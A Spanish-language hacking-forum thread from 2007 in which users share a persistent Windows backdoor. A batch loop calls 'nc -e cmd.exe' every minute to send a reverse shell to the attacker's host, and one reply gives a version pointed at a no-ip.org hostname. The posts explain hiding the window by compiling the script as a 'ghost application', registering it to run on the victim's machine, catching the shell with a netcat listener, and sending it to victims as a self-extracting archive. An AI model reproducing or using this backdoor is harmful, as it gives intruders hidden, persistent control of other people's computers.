elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Backdoor reverse shell con netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Backdoor reverse shell con netcat  (Leído 13,785 veces)
skilled

Desconectado Desconectado

Mensajes: 138


skilled sVr


Ver Perfil WWW
Backdoor reverse shell con netcat
« en: 1 Enero 2007, 23:04 pm »

Bueno posteo mi forma de dejar un backdoor reverse shell:

Creo el siguiente bat:

Código:
@echo off
:svr
nc -d -e cmd.exe x.x.x.x 3333>nul
ping -n 60 localhost>nul
goto svr

Si ejecuto el siguiente bat intentara la conexion a x.x.x.x aproximadamente cada minuto creando un bucle infinito.
(Podemos quitar la linea del ping para que intente la conexion infinitamente).

El problema de la ejecución de este backdoor es el cuadro de dialogo de secuencia de comandos. Para poder ocultarlo compilamos el bat con quick batch file compiler triando la opcion ghost application para que oculte el cuadro.
Finalmente añadimos el exe en el registro de la victima y con tansolo poner en nuestra shell: nc -vv -l -p 3333 obtendremos su shell, y si cerramos la conexion la podremos volver a obtener del mismo metodo.

Nose si alguien ya utilizo este metodo.. yo solo he visto utilizar backdoors revere shell con comandos at. Bueno espero que sirva igual.
« Última modificación: 1 Enero 2007, 23:09 pm por skilled » En línea

Skilled --> Learn + Learn = Surpassing   Surpassing = Rejoicing

octalh


Desconectado Desconectado

Mensajes: 518


"El sueño de la razón produce monstruos"


Ver Perfil WWW
Re: Backdoor reverse shell con netcat
« Respuesta #1 en: 1 Enero 2007, 23:10 pm »

muy util gracias por la info

salu2
En línea

RevangelyonX

Desconectado Desconectado

Mensajes: 245


Ver Perfil WWW
Re: Backdoor reverse shell con netcat
« Respuesta #2 en: 2 Enero 2007, 01:13 am »

Creo que es importante decir, que el bat debe estar en la misma ruta del NC de la victima para que funcione, si no saltará un error, ya que no podrá ejecutar Nc al no encontrar Netcat.

Para que sea compresible, si creamos un bat simple

::No pongamos el @echo off
echo hola
pause
exit

veremos que, al abrirlo, estaremos en la ruta %userprofile%\escritorio>

Con lo cual, o ponemos en bat en la misma carpeta que el nc, o en el bat podemos hacer un:

cd \
cd nc
::por ejemplo

Pero si no, la idea está muy bien! ;)
Un saludo!
En línea

Just Linux
OSCP certified
skilled

Desconectado Desconectado

Mensajes: 138


skilled sVr


Ver Perfil WWW
Re: Backdoor reverse shell con netcat
« Respuesta #3 en: 2 Enero 2007, 01:23 am »

Primero gracias por postear

Citar
bat debe estar en la misma ruta del NC de la victima para que funcione, si no saltará un error

Esto es un backdoor, supuestamente hemos obtenido el control del sistema (o no...) y queremos dejar una puerta trasera. Nc lo mejor es meterlo en system32 si no:

Código:
@echo off
:svr
c:\ruta\nc -d -e cmd.exe x.x.x.x 3333>nul
ping -n 60 localhost>nul
goto svr

Saludos
En línea

Skilled --> Learn + Learn = Surpassing   Surpassing = Rejoicing

octalh


Desconectado Desconectado

Mensajes: 518


"El sueño de la razón produce monstruos"


Ver Perfil WWW
Re: Backdoor reverse shell con netcat
« Respuesta #4 en: 2 Enero 2007, 03:59 am »

lo e probado y funciona bastante bien, la manera de hacer el "timer" para el bucle me parece muy ingeniosa XD mira que usar un ping es algo muy original.

salu2 y gracias por compartirlo
En línea

rakax


Desconectado Desconectado

Mensajes: 341


http://raka.uni.cc


Ver Perfil WWW
Re: Backdoor reverse shell con netcat
« Respuesta #5 en: 2 Enero 2007, 04:21 am »

Y esto serviria si e vez de mi IP pongo la cuenta de NO-IP? es k tengo IP dinamica.
Gracias
En línea

Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc
Zinc


Desconectado Desconectado

Mensajes: 2.194

Argentina


Ver Perfil
Re: Backdoor reverse shell con netcat
« Respuesta #6 en: 2 Enero 2007, 08:26 am »

Seria lo mismo..

Saludos!!
En línea

rakax


Desconectado Desconectado

Mensajes: 341


http://raka.uni.cc


Ver Perfil WWW
Re: Backdoor reverse shell con netcat
« Respuesta #7 en: 2 Enero 2007, 09:02 am »

Quien me explica lo k me pasa,aveces cuando corro un programa en CMD me sale acceso denegado,tengo permisos de administrador,no tengo antivirus ni firewall mal configurado.Hace tiempo k me pasa pero ya no lo aguanto grrr.
Gracias
P.D:Adjunto el codigo para k vean k esta bien,el nc esta en system32
Código:
:svr
nc.exe -d -e cmd.exe raka.no-ip.org 5000>nul
ping -n 60 localhost>nul
goto svr
Gracias
En línea

Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc
skilled

Desconectado Desconectado

Mensajes: 138


skilled sVr


Ver Perfil WWW
Re: Backdoor reverse shell con netcat
« Respuesta #8 en: 2 Enero 2007, 12:32 pm »

Prueva de ponerlo en otra carpeta que no sea system32, si te funciona seguramente seran los permisos. Mira las cuentas que tienes y asegurate que eres admin.

Si no te funciona asegurate de no tener ningun tipo de programa antivirus. Haz un net start y mira que no tengas ningun antivirus o programa parecido, y mira los procesos.

Citar
no tengo antivirus

Si no es nada de esto pillate un antivirus y haz un repasso a tu disco.

Saludos
En línea

Skilled --> Learn + Learn = Surpassing   Surpassing = Rejoicing

Codename!!


Desconectado Desconectado

Mensajes: 883



Ver Perfil
Re: Backdoor reverse shell con netcat
« Respuesta #9 en: 2 Enero 2007, 21:01 pm »

hoy dia el nc es detectado enviale un sfx y veras como el panda le salta a la supuesta victima xdd
En línea

No te dejes mover por las masas, se tu mismo.




Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Bind and Reverse Backdoor Shell con Netcat
Redes
Socket_0x01 0 4,211 Último mensaje 25 Febrero 2011, 05:07 am
por Socket_0x01
BackDoor Meterpreter Reverse TCP (DUDA)
Hacking
ZuriaHack 1 2,948 Último mensaje 16 Enero 2014, 17:17 pm
por Rentero
[PYTHON] Crear reverse shell con socket + netcat
Scripting
Sentex 9 4,813 Último mensaje 4 Octubre 2017, 02:05 am
por engel lex
Error en conexion de una shell reverse con netcat
Hacking
w4sp 2 3,809 Último mensaje 26 Junio 2020, 09:48 am
por w4sp
http, tcp reverse shell
Hacking
juliomob 5 4,748 Último mensaje 6 Noviembre 2020, 14:27 pm
por BloodSharp
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines